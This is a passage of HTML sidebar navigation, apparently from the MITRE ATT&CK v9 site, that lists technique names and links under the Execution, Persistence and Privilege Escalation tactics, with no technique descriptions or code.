class="sidenav-head" id="enterprise-TA0002-T1059-T1059.003"> <a href="/versions/v9/techniques/T1059/003/"> Windows Command Shell </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.004"> <a href="/versions/v9/techniques/T1059/004/"> Unix Shell </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.005"> <a href="/versions/v9/techniques/T1059/005/"> Visual Basic </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.006"> <a href="/versions/v9/techniques/T1059/006/"> Python </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.007"> <a href="/versions/v9/techniques/T1059/007/"> JavaScript </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1059-T1059.008"> <a href="/versions/v9/techniques/T1059/008/"> Network Device CLI </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1609"> <a href="/versions/v9/techniques/T1609/"> Container Administration Command </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1610"> <a href="/versions/v9/techniques/T1610/"> Deploy Container </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1203"> <a href="/versions/v9/techniques/T1203/"> Exploitation for Client Execution </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0002-T1559"> <a href="/versions/v9/techniques/T1559/"> Inter-Process Communication </a> <div class="expand-button collapsed" id="enterprise-TA0002-T1559-header" data-toggle="collapse" data-target="#enterprise-TA0002-T1559-body" aria-expanded="false" aria-controls="#enterprise-TA0002-T1559-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0002-T1559-body" aria-labelledby="enterprise-TA0002-T1559-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1559-T1559.001"> <a href="/versions/v9/techniques/T1559/001/"> Component Object Model </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1559-T1559.002"> <a href="/versions/v9/techniques/T1559/002/"> Dynamic Data Exchange </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1106"> <a href="/versions/v9/techniques/T1106/"> Native API </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0002-T1053"> <a href="/versions/v9/techniques/T1053/"> Scheduled Task/Job </a> <div class="expand-button collapsed" id="enterprise-TA0002-T1053-header" data-toggle="collapse" data-target="#enterprise-TA0002-T1053-body" aria-expanded="false" aria-controls="#enterprise-TA0002-T1053-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0002-T1053-body" aria-labelledby="enterprise-TA0002-T1053-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.001"> <a href="/versions/v9/techniques/T1053/001/"> At (Linux) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.002"> <a href="/versions/v9/techniques/T1053/002/"> At (Windows) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.003"> <a href="/versions/v9/techniques/T1053/003/"> Cron </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.004"> <a href="/versions/v9/techniques/T1053/004/"> Launchd </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.005"> <a href="/versions/v9/techniques/T1053/005/"> Scheduled Task </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.006"> <a href="/versions/v9/techniques/T1053/006/"> Systemd Timers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1053-T1053.007"> <a href="/versions/v9/techniques/T1053/007/"> Container Orchestration Job </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1129"> <a href="/versions/v9/techniques/T1129/"> Shared Modules </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1072"> <a href="/versions/v9/techniques/T1072/"> Software Deployment Tools </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0002-T1569"> <a href="/versions/v9/techniques/T1569/"> System Services </a> <div class="expand-button collapsed" id="enterprise-TA0002-T1569-header" data-toggle="collapse" data-target="#enterprise-TA0002-T1569-body" aria-expanded="false" aria-controls="#enterprise-TA0002-T1569-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0002-T1569-body" aria-labelledby="enterprise-TA0002-T1569-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1569-T1569.001"> <a href="/versions/v9/techniques/T1569/001/"> Launchctl </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1569-T1569.002"> <a href="/versions/v9/techniques/T1569/002/"> Service Execution </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0002-T1204"> <a href="/versions/v9/techniques/T1204/"> User Execution </a> <div class="expand-button collapsed" id="enterprise-TA0002-T1204-header" data-toggle="collapse" data-target="#enterprise-TA0002-T1204-body" aria-expanded="false" aria-controls="#enterprise-TA0002-T1204-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0002-T1204-body" aria-labelledby="enterprise-TA0002-T1204-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1204-T1204.001"> <a href="/versions/v9/techniques/T1204/001/"> Malicious Link </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1204-T1204.002"> <a href="/versions/v9/techniques/T1204/002/"> Malicious File </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1204-T1204.003"> <a href="/versions/v9/techniques/T1204/003/"> Malicious Image </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0002-T1047"> <a href="/versions/v9/techniques/T1047/"> Windows Management Instrumentation </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003"> <a href="/versions/v9/tactics/TA0003"> Persistence </a> <div class="expand-button collapsed" id="enterprise-TA0003-header" data-toggle="collapse" data-target="#enterprise-TA0003-body" aria-expanded="false" aria-controls="#enterprise-TA0003-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-body" aria-labelledby="enterprise-TA0003-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1098"> <a href="/versions/v9/techniques/T1098/"> Account Manipulation </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1098-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1098-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1098-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1098-body" aria-labelledby="enterprise-TA0003-T1098-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1098-T1098.001"> <a href="/versions/v9/techniques/T1098/001/"> Additional Cloud Credentials </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1098-T1098.002"> <a href="/versions/v9/techniques/T1098/002/"> Exchange Email Delegate Permissions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1098-T1098.003"> <a href="/versions/v9/techniques/T1098/003/"> Add Office 365 Global Administrator Role </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1098-T1098.004"> <a href="/versions/v9/techniques/T1098/004/"> SSH Authorized Keys </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1197"> <a href="/versions/v9/techniques/T1197/"> BITS Jobs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1547"> <a href="/versions/v9/techniques/T1547/"> Boot or Logon Autostart Execution </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1547-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1547-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1547-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1547-body" aria-labelledby="enterprise-TA0003-T1547-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.001"> <a href="/versions/v9/techniques/T1547/001/"> Registry Run Keys / Startup Folder </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.002"> <a href="/versions/v9/techniques/T1547/002/"> Authentication Package </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.003"> <a href="/versions/v9/techniques/T1547/003/"> Time Providers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.004"> <a href="/versions/v9/techniques/T1547/004/"> Winlogon Helper DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.005"> <a href="/versions/v9/techniques/T1547/005/"> Security Support Provider </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.006"> <a href="/versions/v9/techniques/T1547/006/"> Kernel Modules and Extensions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.007"> <a href="/versions/v9/techniques/T1547/007/"> Re-opened Applications </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.008"> <a href="/versions/v9/techniques/T1547/008/"> LSASS Driver </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.009"> <a href="/versions/v9/techniques/T1547/009/"> Shortcut Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.010"> <a href="/versions/v9/techniques/T1547/010/"> Port Monitors </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.011"> <a href="/versions/v9/techniques/T1547/011/"> Plist Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.012"> <a href="/versions/v9/techniques/T1547/012/"> Print Processors </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.013"> <a href="/versions/v9/techniques/T1547/013/"> XDG Autostart Entries </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1547-T1547.014"> <a href="/versions/v9/techniques/T1547/014/"> Active Setup </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1037"> <a href="/versions/v9/techniques/T1037/"> Boot or Logon Initialization Scripts </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1037-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1037-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1037-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1037-body" aria-labelledby="enterprise-TA0003-T1037-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1037-T1037.001"> <a href="/versions/v9/techniques/T1037/001/"> Logon Script (Windows) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1037-T1037.002"> <a href="/versions/v9/techniques/T1037/002/"> Logon Script (Mac) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1037-T1037.003"> <a href="/versions/v9/techniques/T1037/003/"> Network Logon Script </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1037-T1037.004"> <a href="/versions/v9/techniques/T1037/004/"> RC Scripts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1037-T1037.005"> <a href="/versions/v9/techniques/T1037/005/"> Startup Items </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1176"> <a href="/versions/v9/techniques/T1176/"> Browser Extensions </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1554"> <a href="/versions/v9/techniques/T1554/"> Compromise Client Software Binary </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1136"> <a href="/versions/v9/techniques/T1136/"> Create Account </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1136-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1136-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1136-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1136-body" aria-labelledby="enterprise-TA0003-T1136-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1136-T1136.001"> <a href="/versions/v9/techniques/T1136/001/"> Local Account </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1136-T1136.002"> <a href="/versions/v9/techniques/T1136/002/"> Domain Account </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1136-T1136.003"> <a href="/versions/v9/techniques/T1136/003/"> Cloud Account </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1543"> <a href="/versions/v9/techniques/T1543/"> Create or Modify System Process </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1543-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1543-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1543-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1543-body" aria-labelledby="enterprise-TA0003-T1543-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1543-T1543.001"> <a href="/versions/v9/techniques/T1543/001/"> Launch Agent </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1543-T1543.002"> <a href="/versions/v9/techniques/T1543/002/"> Systemd Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1543-T1543.003"> <a href="/versions/v9/techniques/T1543/003/"> Windows Service </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1543-T1543.004"> <a href="/versions/v9/techniques/T1543/004/"> Launch Daemon </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1546"> <a href="/versions/v9/techniques/T1546/"> Event Triggered Execution </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1546-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1546-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1546-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1546-body" aria-labelledby="enterprise-TA0003-T1546-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.001"> <a href="/versions/v9/techniques/T1546/001/"> Change Default File Association </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.002"> <a href="/versions/v9/techniques/T1546/002/"> Screensaver </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.003"> <a href="/versions/v9/techniques/T1546/003/"> Windows Management Instrumentation Event Subscription </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.004"> <a href="/versions/v9/techniques/T1546/004/"> Unix Shell Configuration Modification </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.005"> <a href="/versions/v9/techniques/T1546/005/"> Trap </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.006"> <a href="/versions/v9/techniques/T1546/006/"> LC_LOAD_DYLIB Addition </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.007"> <a href="/versions/v9/techniques/T1546/007/"> Netsh Helper DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.008"> <a href="/versions/v9/techniques/T1546/008/"> Accessibility Features </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.009"> <a href="/versions/v9/techniques/T1546/009/"> AppCert DLLs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.010"> <a href="/versions/v9/techniques/T1546/010/"> AppInit DLLs </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.011"> <a href="/versions/v9/techniques/T1546/011/"> Application Shimming </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.012"> <a href="/versions/v9/techniques/T1546/012/"> Image File Execution Options Injection </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.013"> <a href="/versions/v9/techniques/T1546/013/"> PowerShell Profile </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.014"> <a href="/versions/v9/techniques/T1546/014/"> Emond </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1546-T1546.015"> <a href="/versions/v9/techniques/T1546/015/"> Component Object Model Hijacking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1133"> <a href="/versions/v9/techniques/T1133/"> External Remote Services </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1574"> <a href="/versions/v9/techniques/T1574/"> Hijack Execution Flow </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1574-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1574-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1574-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1574-body" aria-labelledby="enterprise-TA0003-T1574-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.001"> <a href="/versions/v9/techniques/T1574/001/"> DLL Search Order Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.002"> <a href="/versions/v9/techniques/T1574/002/"> DLL Side-Loading </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.004"> <a href="/versions/v9/techniques/T1574/004/"> Dylib Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.005"> <a href="/versions/v9/techniques/T1574/005/"> Executable Installer File Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.006"> <a href="/versions/v9/techniques/T1574/006/"> Dynamic Linker Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.007"> <a href="/versions/v9/techniques/T1574/007/"> Path Interception by PATH Environment Variable </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.008"> <a href="/versions/v9/techniques/T1574/008/"> Path Interception by Search Order Hijacking </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.009"> <a href="/versions/v9/techniques/T1574/009/"> Path Interception by Unquoted Path </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.010"> <a href="/versions/v9/techniques/T1574/010/"> Services File Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.011"> <a href="/versions/v9/techniques/T1574/011/"> Services Registry Permissions Weakness </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1574-T1574.012"> <a href="/versions/v9/techniques/T1574/012/"> COR_PROFILER </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1525"> <a href="/versions/v9/techniques/T1525/"> Implant Internal Image </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1556"> <a href="/versions/v9/techniques/T1556/"> Modify Authentication Process </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1556-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1556-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1556-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1556-body" aria-labelledby="enterprise-TA0003-T1556-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1556-T1556.001"> <a href="/versions/v9/techniques/T1556/001/"> Domain Controller Authentication </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1556-T1556.002"> <a href="/versions/v9/techniques/T1556/002/"> Password Filter DLL </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1556-T1556.003"> <a href="/versions/v9/techniques/T1556/003/"> Pluggable Authentication Modules </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1556-T1556.004"> <a href="/versions/v9/techniques/T1556/004/"> Network Device Authentication </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1137"> <a href="/versions/v9/techniques/T1137/"> Office Application Startup </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1137-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1137-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1137-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1137-body" aria-labelledby="enterprise-TA0003-T1137-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1137-T1137.001"> <a href="/versions/v9/techniques/T1137/001/"> Office Template Macros </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1137-T1137.002"> <a href="/versions/v9/techniques/T1137/002/"> Office Test </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1137-T1137.003"> <a href="/versions/v9/techniques/T1137/003/"> Outlook Forms </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1137-T1137.004"> <a href="/versions/v9/techniques/T1137/004/"> Outlook Home Page </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1137-T1137.005"> <a href="/versions/v9/techniques/T1137/005/"> Outlook Rules </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1137-T1137.006"> <a href="/versions/v9/techniques/T1137/006/"> Add-ins </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1542"> <a href="/versions/v9/techniques/T1542/"> Pre-OS Boot </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1542-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1542-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1542-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1542-body" aria-labelledby="enterprise-TA0003-T1542-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1542-T1542.001"> <a href="/versions/v9/techniques/T1542/001/"> System Firmware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1542-T1542.002"> <a href="/versions/v9/techniques/T1542/002/"> Component Firmware </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1542-T1542.003"> <a href="/versions/v9/techniques/T1542/003/"> Bootkit </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1542-T1542.004"> <a href="/versions/v9/techniques/T1542/004/"> ROMMONkit </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1542-T1542.005"> <a href="/versions/v9/techniques/T1542/005/"> TFTP Boot </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1053"> <a href="/versions/v9/techniques/T1053/"> Scheduled Task/Job </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1053-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1053-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1053-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1053-body" aria-labelledby="enterprise-TA0003-T1053-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.001"> <a href="/versions/v9/techniques/T1053/001/"> At (Linux) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.002"> <a href="/versions/v9/techniques/T1053/002/"> At (Windows) </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.003"> <a href="/versions/v9/techniques/T1053/003/"> Cron </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.004"> <a href="/versions/v9/techniques/T1053/004/"> Launchd </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.005"> <a href="/versions/v9/techniques/T1053/005/"> Scheduled Task </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.006"> <a href="/versions/v9/techniques/T1053/006/"> Systemd Timers </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1053-T1053.007"> <a href="/versions/v9/techniques/T1053/007/"> Container Orchestration Job </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1505"> <a href="/versions/v9/techniques/T1505/"> Server Software Component </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1505-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1505-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1505-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1505-body" aria-labelledby="enterprise-TA0003-T1505-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1505-T1505.001"> <a href="/versions/v9/techniques/T1505/001/"> SQL Stored Procedures </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1505-T1505.002"> <a href="/versions/v9/techniques/T1505/002/"> Transport Agent </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1505-T1505.003"> <a href="/versions/v9/techniques/T1505/003/"> Web Shell </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1205"> <a href="/versions/v9/techniques/T1205/"> Traffic Signaling </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1205-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1205-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1205-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1205-body" aria-labelledby="enterprise-TA0003-T1205-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1205-T1205.001"> <a href="/versions/v9/techniques/T1205/001/"> Port Knocking </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0003-T1078"> <a href="/versions/v9/techniques/T1078/"> Valid Accounts </a> <div class="expand-button collapsed" id="enterprise-TA0003-T1078-header" data-toggle="collapse" data-target="#enterprise-TA0003-T1078-body" aria-expanded="false" aria-controls="#enterprise-TA0003-T1078-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0003-T1078-body" aria-labelledby="enterprise-TA0003-T1078-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1078-T1078.001"> <a href="/versions/v9/techniques/T1078/001/"> Default Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1078-T1078.002"> <a href="/versions/v9/techniques/T1078/002/"> Domain Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1078-T1078.003"> <a href="/versions/v9/techniques/T1078/003/"> Local Accounts </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0003-T1078-T1078.004"> <a href="/versions/v9/techniques/T1078/004/"> Cloud Accounts </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004"> <a href="/versions/v9/tactics/TA0004"> Privilege Escalation </a> <div class="expand-button collapsed" id="enterprise-TA0004-header" data-toggle="collapse" data-target="#enterprise-TA0004-body" aria-expanded="false" aria-controls="#enterprise-TA0004-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-body" aria-labelledby="enterprise-TA0004-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0004-T1548"> <a href="/versions/v9/techniques/T1548/"> Abuse Elevation Control Mechanism </a> <div class="expand-button collapsed" id="enterprise-TA0004-T1548-header" data-toggle="collapse" data-target="#enterprise-TA0004-T1548-body" aria-expanded="false" aria-controls="#enterprise-TA0004-T1548-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0004-T1548-body" aria-labelledby="enterprise-TA0004-T1548-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1548-T1548.001"> <a href="/versions/v9/techniques/T1548/001/"> Setuid and Setgid </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1548-T1548.002"> <a href="/versions/v9/techniques/T1548/002/"> Bypass User Account Control </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1548-T1548.003"> <a href="/versions/v9/techniques/T1548/003/"> Sudo and Sudo Caching </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0004-T1548-T1548.004"> <a href="/versions/v9/techniques/T1548/004/"> Elevated Execution with Prompt </a> </div> </div> </div> </div> <div class="sidenav"> <div 